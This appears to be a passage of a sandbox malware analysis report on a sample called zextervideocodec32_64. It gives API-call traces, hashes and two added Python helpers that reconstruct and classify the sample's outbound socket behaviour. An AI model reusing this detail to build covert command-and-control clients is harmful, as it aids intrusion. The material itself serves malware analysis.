                                                                                                      • htonl.WS2_32(?), ref: 02BC497C
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC4983
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC49C8
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC49CF
                                                                                                      • htons.WS2_32(?), ref: 02BC49EF
                                                                                                      • htons.WS2_32(?), ref: 02BC49F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1645262487-0
                                                                                                      • Opcode ID: 9821fca22ae025abb8c8b6b39ebfce2aaea5fee9f6817cf4306d65c5218e7dbd
                                                                                                      • Instruction ID: 40457734829a43ef054147ef6c9d8122603d812705825655aabbc11b541cb085
                                                                                                      • Opcode Fuzzy Hash: 9821fca22ae025abb8c8b6b39ebfce2aaea5fee9f6817cf4306d65c5218e7dbd
                                                                                                      • Instruction Fuzzy Hash: D2022771D00259EEEF15DFA4D854BEEBBB9AF04304F20419EE545B7280DB746A88CFA1

                                                                                                      Control-flow Graph (rendered in the original report with executed / not-executed node colouring; entry block 2bc4d86-2bc4dcb, exit via 2bc50e4-2bc50f4)
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC4D8B
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC4DB7
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC4DC3
                                                                                                        • Part of subcall function 02BC4BED: __EH_prolog.LIBCMT ref: 02BC4BF2
                                                                                                        • Part of subcall function 02BC4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02BC4CF2
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC4E93
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC4E99
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC4EA0
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC4EA6
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC50A7
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC50AD
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC50B8
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC50C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                      • String ID:
                                                                                                      • API String ID: 2062355503-0
                                                                                                      • Opcode ID: b0d424a15e6128ee852868994266b1693fd613e0b81c841ce024ab2c6e6ab1bb
                                                                                                      • Instruction ID: d5c810beec607ea3b721c4ced4d98a20e7af8d164ce68c2443ac58a77e4cca52
                                                                                                      • Opcode Fuzzy Hash: b0d424a15e6128ee852868994266b1693fd613e0b81c841ce024ab2c6e6ab1bb
                                                                                                      • Instruction Fuzzy Hash: 63B12971D0025EDEEF25DF94C844BEEBBB5AF04314F20409EE509B6181DBB46A89CFA1

                                                                                                      Control-flow Graph (rendered in the original report with executed / not-executed node colouring; entry block 401f64-401f84, exit via 402096-40209a)
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                                      • GetLastError.KERNEL32 ref: 00401F86
                                                                                                      • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                      • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                                      • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                      • String ID:
                                                                                                      • API String ID: 564119183-0
                                                                                                      • Opcode ID: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                                      • Instruction ID: 5f40b5bb2c798fd06435bc38b1d437300a77b6e6fc54339f6675bf13ecd45336
                                                                                                      • Opcode Fuzzy Hash: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                                      • Instruction Fuzzy Hash: 45314E71A00255AFDB105FB59F8896F7F68EF45344F10807AFE86F7281DA748845C7A8

                                                                                                      Control-flow Graph (rendered in the original report with executed / not-executed node colouring; entry block 2bc26db-2bc2726, exit via 2bc27d5-2bc27f0)
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BC2706
                                                                                                      • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02BC272B
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BE5B33), ref: 02BC2738
                                                                                                        • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                                                      • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02BC2778
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC27D9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                      • String ID: timer
                                                                                                      • API String ID: 4293676635-1792073242
                                                                                                      • Opcode ID: 165d300a08d888fc2e8c500b3e049f5dd6f766e7106725eacd0e3fc61299d38b
                                                                                                      • Instruction ID: b03259388e62484b24fdd58975106fad66ebb921368cdceab8886a03e1199f26
                                                                                                      • Opcode Fuzzy Hash: 165d300a08d888fc2e8c500b3e049f5dd6f766e7106725eacd0e3fc61299d38b
                                                                                                      • Instruction Fuzzy Hash: EB31C0B1804701EFD710DF25C984B66BBE8FB48764F104AAEF85587681DB70E810CF91

                                                                                                      Control-flow Graph (rendered in the original report with executed / not-executed node colouring; entry block 2bc2b95-2bc2baf, exit via 2bc2d32-2bc2d38)
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2BE4
                                                                                                      • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02BC2C07
                                                                                                        • Part of subcall function 02BCA4DF: WSAGetLastError.WS2_32(00000000,?,?,02BC2A51), ref: 02BCA4ED
                                                                                                      • WSASetLastError.WS2_32 ref: 02BC2CD3
                                                                                                      • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02BC2CE7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Recvselect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 886190287-280543908
                                                                                                      • Opcode ID: 408767b6a9fa507bdc69f3aeb2eb48ff8d66c850199e036b7aff87966fe57b18
                                                                                                      • Instruction ID: bf6c44591a77c15af4ffebec0108feece1d36b117e41a61145883935642151c2
                                                                                                      • Opcode Fuzzy Hash: 408767b6a9fa507bdc69f3aeb2eb48ff8d66c850199e036b7aff87966fe57b18
                                                                                                      • Instruction Fuzzy Hash: 7A414CB19153019FDB20AF64C5447ABBBE9EF94364F200D9EE99987280EBB4D540CB92
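                                                                                                      The WSASetLastError(0) / WSARecv / select sequence traced above is the standard non-blocking receive loop (the ioctlsocket command 8004667E seen later in this dump is FIONBIO, which switches the socket to non-blocking mode). The Python below is an added reconstruction of that pattern for analysts; it is not the sample's code and not part of the Joe Sandbox report. It assumes that the untraced branch between WSARecv and select is the WSAEWOULDBLOCK case and that select() is given a fixed timeout, neither of which the API trace shows; the data it reads comes from a constructed local socketpair, not captured C2 traffic.

```python
import select
import socket
from typing import Optional, Tuple

# Assumed select() timeout in seconds: the trace shows select() being called
# but not the timeval passed to it, so this value is an assumption.
SELECT_TIMEOUT = 2.0


def recv_nonblocking(sock: socket.socket, nbytes: int,
                     timeout: float = SELECT_TIMEOUT) -> Optional[bytes]:
    """Reconstruction of the traced loop: put the socket in non-blocking mode
    (ioctlsocket FIONBIO), clear the error state (WSASetLastError(0)), try a
    receive (WSARecv), and if it would block wait on select() before retrying.
    Returns the bytes read, b'' on orderly shutdown by the peer, or None when
    select() times out with nothing to read."""
    sock.setblocking(False)          # ioctlsocket(s, FIONBIO, 1)
    while True:
        try:
            return sock.recv(nbytes)  # WSARecv on a non-blocking socket
        except BlockingIOError:
            # WSAEWOULDBLOCK: nothing queued yet, block in select() until
            # the socket is readable or the timeout expires, then retry.
            readable, _, _ = select.select([sock], [], [], timeout)
            if not readable:
                return None


def demo() -> Tuple[Optional[bytes], Optional[bytes], Optional[bytes]]:
    """Drive the loop over a local socketpair (constructed traffic, not
    captured data) and return the three outcomes: data, timeout, EOF."""
    a, b = socket.socketpair()
    try:
        b.sendall(b"hello")                          # constructed sample bytes
        got = recv_nonblocking(a, 16)                # data already queued
        idle = recv_nonblocking(a, 16, timeout=0.2)  # nothing queued: times out
        b.close()                                    # peer shuts down
        eof = recv_nonblocking(a, 16)                # recv returns b'' at EOF
    finally:
        a.close()
        b.close()  # closing an already-closed Python socket is a no-op
    return got, idle, eof


if __name__ == "__main__":
    print(demo())
```

The three outcomes of demo() are the three paths an analyst needs to distinguish when reading the decompiled loop: a successful read, a timeout with no data, and the peer closing the connection, which WSARecv reports as a zero-length read rather than an error.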

                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32 ref: 00402ED6
                                                                                                        • Part of subcall function 00403FF4: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                                                                        • Part of subcall function 00403FF4: HeapDestroy.KERNEL32 ref: 00404044
                                                                                                      • GetCommandLineA.KERNEL32 ref: 00402F24
                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00402F4F
                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402F72
                                                                                                        • Part of subcall function 00402FCB: ExitProcess.KERNEL32 ref: 00402FE8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                      • String ID: Y
                                                                                                      • API String ID: 2057626494-4136946213
                                                                                                      • Opcode ID: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                                                                      • Instruction ID: ae24bdd31f92ba5c0019e7eb98566f973638ce5b9b082510a96f2684413349a7
                                                                                                      • Opcode Fuzzy Hash: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                                                                      • Instruction Fuzzy Hash: 3721A1B1840615ABDB14AFA6DE4AA6E7FB8EF44705F10413FF501B72D1DB384500CB58
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2A3B
                                                                                                      • closesocket.WS2_32 ref: 02BC2A42
                                                                                                      • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02BC2A89
                                                                                                      • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02BC2A97
                                                                                                      • closesocket.WS2_32 ref: 02BC2A9E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                                      • String ID:
                                                                                                      • API String ID: 1561005644-0
                                                                                                      • Opcode ID: 8ab73392da109a8a76ce5b973068fb15b9e12a3cd98529d7b9e5cab6b49e8961
                                                                                                      • Instruction ID: f3e3511a0ac6ef53713a1d83664e13d45fea8f5a4b6169f68b2311cc1f3118b0
                                                                                                      • Opcode Fuzzy Hash: 8ab73392da109a8a76ce5b973068fb15b9e12a3cd98529d7b9e5cab6b49e8961
                                                                                                      • Instruction Fuzzy Hash: 6421D675E00215EBEB20ABB8D844B6EB7E9DF48315F2449EDFD65C7240EB70C9418B61
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 1633115879-0
                                                                                                      • Opcode ID: 37de1c3da8be93f749d4621cef1e6ad0e514ae15d7e26f58aad92da245220131
                                                                                                      • Instruction ID: 1f29817c0bb33c67ad60c04e07f84fb440ce9dc58c5d4a0585f46f23ae6a4cde
                                                                                                      • Opcode Fuzzy Hash: 37de1c3da8be93f749d4621cef1e6ad0e514ae15d7e26f58aad92da245220131
                                                                                                      • Instruction Fuzzy Hash: BE218D75910204DFDB14CF68C44479ABBB5FF48714F20858DE859AB302DB74E905CBE0
                                                                                                      APIs
                                                                                                      • GetCommandLineW.KERNEL32 ref: 0040279F
                                                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 00402895
                                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D9FE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CommandLine$ArgvLocalTime
                                                                                                      • String ID: XiM#
                                                                                                      • API String ID: 3768950922-2404075716
                                                                                                      • Opcode ID: b9f1d27c841553a6286a37432cf0b285126cb2c39f5f0c794a39fb817397f4e9
                                                                                                      • Instruction ID: de3cc8fe9ec75cbd48575bc385f6373e9aba7dd0c2470f36669371c28cae3d1f
                                                                                                      • Opcode Fuzzy Hash: b9f1d27c841553a6286a37432cf0b285126cb2c39f5f0c794a39fb817397f4e9
                                                                                                      • Instruction Fuzzy Hash: 5ED09271805102EFC3042BE09F0812936A4AA093453610A3EE243B51E0CB78104EAB2E
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2EEE
                                                                                                      • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02BC2EFD
                                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02BC2F0C
                                                                                                      • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02BC2F36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Socketsetsockopt
                                                                                                      • String ID:
                                                                                                      • API String ID: 2093263913-0
                                                                                                      • Opcode ID: 72d1f20c8cdfe9ddf03d4987885d4f76e7bd94ebf419b3350616b0d269a42857
                                                                                                      • Instruction ID: 9e6e4ba00f7c1940fcb403d938ab291309852510814267ad601b12a838b29093
                                                                                                      • Opcode Fuzzy Hash: 72d1f20c8cdfe9ddf03d4987885d4f76e7bd94ebf419b3350616b0d269a42857
                                                                                                      • Instruction Fuzzy Hash: 08018D71941214FBDF205F65DC88F9ABBA9EF85761F008559F918CF141D77088008B70
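The WS2_32 call lists in the 02BC1000 region above (getaddrinfo, WSASocketA with dwFlags 00000001, setsockopt at level 00000029/option 0000001B, ioctlsocket with 8004667E, connect, select with NULL read and except sets, WSASend inside the subcall at 02BC2D39, getsockname, closesocket) record, one function at a time, the pieces of an outbound TCP client. The Python script below is an added example and is not part of the Joe Sandbox report, the Joe Sandbox tooling or the sample: it parses bullet lines in the layout this page uses, decodes the Winsock constants the sandbox recorded (FIONBIO, IPPROTO_IPV6, IPV6_V6ONLY and WSA_FLAG_OVERLAPPED are Windows SDK values), and lists which stages of a client connection the dumped region contains. The bullet grammar it accepts is assumed from this page, and the stage names are the example's own vocabulary.

```python
"""Decode the 'APIs' bullet lines of a Joe Sandbox function block into a network-behaviour summary."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: bullet lines copied from the WS2_32 and KERNELBASE
# blocks of this report. The nested line keeps its "Part of subcall function" prefix.
SAMPLE_API_LINES = """\
• ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02BC2A89
• closesocket.WS2_32 ref: 02BC2A9E
• WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02BC2EFD
• setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02BC2F36
• connect.WS2_32(?,?,?), ref: 02BC2AF5
• select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02BC2E83
  • Part of subcall function 02BC2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02BC2D5C
• getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 02BC9858
• getsockname.WS2_32(?,?,?), ref: 02BC96BC
• RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 00402792
"""

# Winsock constants, values as defined in the Windows SDK headers.
FIONBIO = 0x8004667E        # ioctlsocket command: toggle non-blocking mode
IPPROTO_IPV6 = 41           # setsockopt level
IPV6_V6ONLY = 27            # setsockopt option at that level: 0 = dual-stack, 1 = IPv6 only
WSA_FLAG_OVERLAPPED = 0x01  # WSASocketA dwFlags: socket usable for asynchronous I/O

# One bullet: optional subcall prefix, api.module, optional (args), then "ref: <addr>".
# This grammar is assumed from the layout of the report page, not from any Joe Sandbox spec.
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*?)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    parent: Optional[str]  # address of the enclosing subcall function for nested bullets


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn report bullet lines into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref"), m.group("parent")))
    return calls


def _hex(arg: str) -> Optional[int]:
    """The sandbox prints unresolved arguments as '?'; only decode real hex words."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def annotate(call: ApiCall) -> str:
    """Explain the recorded constants for the calls that matter to the client pattern."""
    a = call.args
    if call.api == "ioctlsocket" and len(a) >= 2 and _hex(a[1]) == FIONBIO:
        return "FIONBIO: socket switched to non-blocking mode"
    if call.api == "setsockopt" and len(a) >= 3 and _hex(a[1]) == IPPROTO_IPV6 and _hex(a[2]) == IPV6_V6ONLY:
        return "IPPROTO_IPV6/IPV6_V6ONLY: dual-stack option set (the value itself is not in the report)"
    if call.api == "WSASocketA" and len(a) >= 6 and _hex(a[5]) == WSA_FLAG_OVERLAPPED:
        return "WSA_FLAG_OVERLAPPED: socket created for asynchronous (completion-port style) I/O"
    if call.api == "select" and len(a) >= 4 and _hex(a[1]) == 0 and _hex(a[3]) == 0:
        return "readfds/exceptfds NULL: waits for writability, the usual way to finish a non-blocking connect"
    return ""


# Stage names are this example's own vocabulary for the phases of an outbound TCP client.
STAGE_OF = {
    "getaddrinfo": "resolve", "GetAddrInfoW": "resolve",
    "WSASocketA": "create", "WSASocketW": "create", "socket": "create",
    "setsockopt": "configure", "ioctlsocket": "configure",
    "connect": "connect", "WSAConnect": "connect",
    "select": "wait",
    "WSASend": "transfer", "send": "transfer", "WSARecv": "transfer", "recv": "transfer",
    "getsockname": "inspect",
    "closesocket": "teardown",
}
STAGE_ORDER = ["resolve", "create", "configure", "connect", "wait", "transfer", "inspect", "teardown"]


def network_stages(calls: List[ApiCall]) -> List[str]:
    """Which client phases the dumped region contains, in canonical order."""
    present = {STAGE_OF[c.api] for c in calls if c.module == "WS2_32" and c.api in STAGE_OF}
    return [s for s in STAGE_ORDER if s in present]


def is_outbound_client(calls: List[ApiCall]) -> bool:
    """True when the region resolves names, creates sockets, connects and sends: it dials out."""
    return {"resolve", "create", "connect", "transfer"} <= set(network_stages(calls))


def summarize(text: str) -> str:
    calls = parse_api_lines(text)
    out = []
    for c in calls:
        note = annotate(c)
        nested = f" (inside {c.parent})" if c.parent else ""
        out.append(f"{c.ref}: {c.api}.{c.module}{nested}" + (f"  -- {note}" if note else ""))
    out.append("stages: " + " -> ".join(network_stages(calls)))
    out.append("outbound client pattern: " + str(is_outbound_client(calls)))
    return "\n".join(out)


if __name__ == "__main__":
    print(summarize(SAMPLE_API_LINES))
```

Running it over the whole APIs dump of one memory region shows at a glance whether that region carries the resolve/create/connect/send chain, which is what separates the 02BC1000 region above from the 00400000 loader region that only touches the registry, the command line and the heap. Arguments the sandbox could not resolve stay as '?', so the checks only fire on constants the report actually recorded.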
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BC2D39: WSASetLastError.WS2_32(00000000), ref: 02BC2D47
                                                                                                        • Part of subcall function 02BC2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02BC2D5C
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2E6D
                                                                                                      • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02BC2E83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Sendselect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 2958345159-280543908
                                                                                                      • Opcode ID: 10024330f6159e5e70c869a6398d9c5ed2e09ee6c444b05de78f9bdaf6f3e110
                                                                                                      • Instruction ID: 011b3da6e698b48dd16aa4db3934a4cb44b613b151dd3e3739bf2d63bf873ae8
                                                                                                      • Opcode Fuzzy Hash: 10024330f6159e5e70c869a6398d9c5ed2e09ee6c444b05de78f9bdaf6f3e110
                                                                                                      • Instruction Fuzzy Hash: F431BEB0E012199FDF10EF64D804BEE7BAAEF05354F2045DEED1597240EBB095518FA0
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02BC83A9,?,?,00000000), ref: 02BC96A6
                                                                                                      • getsockname.WS2_32(?,?,?), ref: 02BC96BC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastgetsockname
                                                                                                      • String ID: &'
                                                                                                      • API String ID: 566540725-655172784
                                                                                                      • Opcode ID: 8b57f92c9610429ac1667ef64065bebefa61d1eb98d7a9586c3230f27021affe
                                                                                                      • Instruction ID: 8d803af34d914abb531221d2e78de1d6b53f286731516c1933a273bbf1ba9a36
                                                                                                      • Opcode Fuzzy Hash: 8b57f92c9610429ac1667ef64065bebefa61d1eb98d7a9586c3230f27021affe
                                                                                                      • Instruction Fuzzy Hash: E0216571A01248DBDB10EF68D844ADEBBF5FF4C314F21856AE919EB280EB34E9458B50
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2AEA
                                                                                                      • connect.WS2_32(?,?,?), ref: 02BC2AF5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastconnect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 374722065-280543908
                                                                                                      • Opcode ID: 2769607d8c369f2e623bd2ec4ff51e74da7c3ecd7a49713c99612e9cec00e6fa
                                                                                                      • Instruction ID: 104638891e9a0b46a217ac017b98ef4e97e27f85541b5f5156026dc646e067e7
                                                                                                      • Opcode Fuzzy Hash: 2769607d8c369f2e623bd2ec4ff51e74da7c3ecd7a49713c99612e9cec00e6fa
                                                                                                      • Instruction Fuzzy Hash: BF21A771E00214ABDF14BFB4D444AEEBBBAEF44324F2085DDED1997280EBB446018FA1
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 00402792
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID: Common AppData
                                                                                                      • API String ID: 3660427363-2574214464
                                                                                                      • Opcode ID: 158ae254c2c16aa740a981b966b7fddd2cbe96f16fcdc6f9a27de899f2d968d4
                                                                                                      • Instruction ID: 9a277ccd48b8da7b9e07736cee9e399eb09a3ecf5512108b267f3c7f6d774d12
                                                                                                      • Opcode Fuzzy Hash: 158ae254c2c16aa740a981b966b7fddd2cbe96f16fcdc6f9a27de899f2d968d4
                                                                                                      • Instruction Fuzzy Hash: FFE09270C18104EBCB010BE04E0897E37747A087257314E77E423760E1C7BE580AB69F
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC984A
                                                                                                      • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 02BC9858
                                                                                                      • FreeAddrInfoW.WS2_32(?), ref: 02BC998C
                                                                                                        • Part of subcall function 02BC9F2B: __EH_prolog.LIBCMT ref: 02BC9F30
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
